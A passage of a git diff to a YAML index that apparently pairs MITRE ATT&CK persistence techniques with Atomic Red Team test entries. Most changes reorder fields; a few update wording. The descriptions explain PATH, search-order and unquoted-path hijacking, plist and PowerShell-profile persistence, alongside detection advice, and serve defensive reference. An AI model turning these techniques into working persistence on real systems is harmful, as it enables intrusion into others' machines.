+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.004:
technique:
@@ -12612,22 +12840,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:35:51.656Z'
created: '2019-11-07T20:09:56.536Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.005:
technique:
@@ -12664,22 +12892,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:36:15.923Z'
created: '2019-11-07T20:00:25.560Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1034:
technique:
@@ -12687,7 +12915,7 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Path Interception
description: |-
- **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
+ **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
@@ -12757,15 +12985,19 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-30T13:45:24.192Z'
+ modified: '2020-07-06T18:49:35.645Z'
created: '2017-05-31T21:30:36.140Z'
- x_mitre_deprecated: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor file creation for files named after partial directories
and in locations that may be searched for common processes through the environment
variable, or otherwise should not be user writable. Monitor the executing
@@ -12778,20 +13010,27 @@ persistence:
that could lead to other activities, such as network connections made for
Command and Control, learning details about the environment through Discovery,
and Lateral Movement."
- x_mitre_effective_permissions:
- - User
- - Administrator
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_deprecated: true
atomic_tests: []
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -12799,17 +13038,6 @@ persistence:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -12818,7 +13046,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -12834,10 +13062,33 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
@@ -12860,29 +13111,6 @@ persistence:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -12907,17 +13135,16 @@ persistence:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -12941,16 +13168,17 @@ persistence:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -12996,6 +13224,14 @@ persistence:
elevation_required: true
T1547.011:
technique:
+ created: '2020-01-24T20:02:59.149Z'
+ modified: '2020-06-20T19:57:36.136Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a
description: "Adversaries may modify plist files to run a program during system
boot or user login. Property list (plist) files contain all of the information
@@ -13052,31 +13288,23 @@ persistence:
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
source_name: OSX.Dok Malware
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T19:47:38.978Z'
- created: '2020-01-24T20:02:59.149Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
-
- All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
-
- Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: |-
+ File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
+
+ All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
+
+ Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1547.011
atomic_tests:
- name: Plist Modification
@@ -13098,12 +13326,12 @@ persistence:
2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
name: manual
- T1545.001:
+ T1205.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1205.001
+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
@@ -13118,7 +13346,7 @@ persistence:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -13127,22 +13355,21 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1547.010:
technique:
@@ -13187,17 +13414,13 @@ persistence:
phase_name: privilege-escalation
modified: '2020-01-24T19:46:27.750Z'
created: '2020-01-24T19:46:27.750Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- - DLL monitoring
- - Windows Registry
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation:
AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are
abnormal. New DLLs written to the System32 directory that do not correlate
@@ -13205,13 +13428,17 @@ persistence:
writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
Run the Autoruns utility, which checks for this Registry key as a persistence
mechanism (Citation: TechNet Autoruns)"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ - DLL monitoring
+ - Windows Registry
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.013:
technique:
@@ -13265,15 +13492,11 @@ persistence:
phase_name: persistence
modified: '2020-03-24T21:31:31.082Z'
created: '2020-01-24T15:11:02.758Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Allen DeRyke, ICE
- x_mitre_data_sources:
- - PowerShell logs
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
@@ -13283,11 +13506,15 @@ persistence:
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - PowerShell logs
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Allen DeRyke, ICE
+ x_mitre_platforms:
+ - Windows
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -13351,21 +13578,11 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T23:50:48.319Z'
+ modified: '2020-05-19T21:22:38.174Z'
created: '2019-11-13T14:44:49.439Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
-
- Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Linux
+ - Windows
x_mitre_data_sources:
- VBR
- MBR
@@ -13375,9 +13592,19 @@ persistence:
- EFI
- BIOS
- API monitoring
- x_mitre_platforms:
- - Linux
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
+
+ Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1037.004:
technique:
@@ -13410,18 +13637,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:46:20.433Z'
created: '2020-01-15T16:25:22.260Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_detection: 'The /etc/rc.common file can be monitored to
- detect changes from the company policy. Monitor process execution resulting
- from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- Process monitoring
- File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: 'The /etc/rc.common file can be monitored to
+ detect changes from the company policy. Monitor process execution resulting
+ from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -13441,18 +13668,15 @@ persistence:
name: bash
T1547.007:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.007
- url: https://attack.mitre.org/techniques/T1547/007
- - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- description: Patrick Wardle. (2014, September). Methods of Malware Persistence
- on Mac OS X. Retrieved July 5, 2017.
- source_name: Methods of Mac Malware Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Re-opened Applications
+ created: '2020-01-24T18:15:06.641Z'
+ modified: '2020-01-24T19:51:37.795Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
description: "Adversaries may modify plist files to automatically run an application
when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain
applications to be re-opened when a user logs into their machine after reboot.
@@ -13463,15 +13687,18 @@ persistence:
\n\nAn adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time
the user reboots their machine (Citation: Methods of Mac Malware Persistence)."
- id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-01-24T19:51:37.795Z'
- created: '2020-01-24T18:15:06.641Z'
+ name: Re-opened Applications
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.007
+ url: https://attack.mitre.org/techniques/T1547/007
+ - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
+ description: Patrick Wardle. (2014, September). Methods of Malware Persistence
+ on Mac OS X. Retrieved July 5, 2017.
+ source_name: Methods of Mac Malware Persistence
x_mitre_platforms:
- macOS
x_mitre_data_sources:
@@ -13565,33 +13792,9 @@ persistence:
phase_name: persistence
modified: '2020-03-30T13:47:29.922Z'
created: '2017-05-31T21:31:18.867Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- - Office 365
- - SaaS
- - Azure AD
- x_mitre_detection: |-
- Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
-
- Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
-
- If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
-
- For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
- x_mitre_defense_bypassed:
- - Network intrusion detection system
- - Anti-virus
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- Office 365 account logs
- Azure activity logs
@@ -13604,9 +13807,33 @@ persistence:
- File monitoring
- Authentication logs
- Binary file metadata
- x_mitre_version: '3.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_defense_bypassed:
+ - Network intrusion detection system
+ - Anti-virus
+ x_mitre_detection: |-
+ Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
+
